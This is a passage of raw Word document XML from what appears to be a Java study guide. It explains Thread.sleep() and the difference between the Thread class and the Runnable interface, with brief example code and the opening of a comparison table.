      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or simulating real-world wait times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69156D93" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1120"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Interruptions</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the thread is interrupted while sleeping, an InterruptedException will be thrown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76198B3F" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1120"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Precision</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The actual sleep time may be slightly longer than requested, depending on the system's scheduling and clock granularity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFFF0D6" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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How It Works Internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C732D0" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1121"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Internally, when Thread.sleep() is invoked, the JVM interacts with the underlying operating system to suspend the thread for the specified time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F50CB6" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1121"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The thread enters the "sleep" state and is added to a queue managed by the operating system or the JVM for thread scheduling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F56FF8" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1121"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When the specified sleep time is over, the thread is moved to a </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> state, meaning it is eligible to execute, but the JVM's thread scheduler may choose to execute it at a later time depending on thread priorities and system resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D54C5D"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In summary, Thread.sleep() is a way to pause the execution of the current thread for a specific time period. It doesn't release any locks or resources and can be interrupted if another thread signals the current thread to stop sleeping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349F5EB2" w14:textId="256F5A44" w:rsidR="00BD73D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BD73D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="1DAD890C">
          <v:rect id="_x0000_i1825" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38783310" w14:textId="4577A9CC" w:rsidR="00C836C6" w:rsidRPr="00CE4B95" w:rsidRDefault="00E0485A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="268" w:name="_Toc196307748"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Thread and Runnable in Java</w:t>
      </w:r>
      <w:r w:rsidR="00C836C6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="268"/>
    </w:p>
    <w:p w14:paraId="3C3D2297" w14:textId="762A741E" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In Java, both Thread and Runnable are used for multi-threading, but they have distinct roles and characteristics. Here's a detailed explanation of the difference between Thread and Runnable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1064C56A" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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1. Thread Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F61CB9" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1122"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Thread is a </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java that represents an individual thread of execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B894EF" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1122"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To create a thread using Thread, you need to either:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743689B6" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1122"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Extend the Thread class</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and override the run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4DF2BE" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1122"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Or, you can create an instance of Thread and pass a Runnable object to the constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286644F5" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1122"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread Lifecycle</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It manages the lifecycle of the thread (such as starting, running, and finishing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76702E10" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1122"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Single Inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since Java does not support multiple inheritance, if you extend Thread, you cannot extend any other class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A40B75" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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Example of Thread class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585853DB"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class MyThread extends Thread {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F95D5EB"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423C7EA6"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void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D37DD3"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Thread is running");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8EC11F"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2893A851"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ACEE0A" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C34BB77"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public class ThreadExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E08A928"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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4E5712"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MyThread thread = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216F2AFA"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hread.start();  // Starts the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D07FB4"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19BFEFCA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735ED23A" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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2. Runnable Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B3DD9B" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1123"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Runnable is a </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional interface</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java with a single abstract method run(). It represents a task that can be executed by a thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A493163" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1123"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To create a thread using Runnable, you need to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F89801" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1123"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Implement the Runnable interface</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and override the run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEC2D91" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1123"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Then, you create an instance of Thread, passing the Runnable object to its constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429CC6ED" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1123"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Multiple Inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since Runnable is an interface, a class can implement it while also extending another class, which gives more flexibility than extending Thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1388553B" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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Example of Runnable interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703A77D2"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class MyRunnable implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E13A6C2"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F11082"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void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15130F44"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Runnable task is running");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173D547C"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26DED60A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC611ED" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42AA9833"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public class RunnableExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259DB3F8"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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0E09F6"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MyRunnable task = new MyRunnable();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA0E62D"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hread thread = new Thread(task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AB34F3"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hread.start();  // Starts the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411B17A2"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47667506"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A4327C" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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6"/>
        <w:gridCol w:w="4149"/>
        <w:gridCol w:w="4389"/>
      </w:tblGrid>
      <w:tr w:rsidR="00812E86" w:rsidRPr="004E218C" w14:paraId="11D61112" w14:textId="77777777" w:rsidTr="00812E86">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76318793" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="652B0C02" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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Thread</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
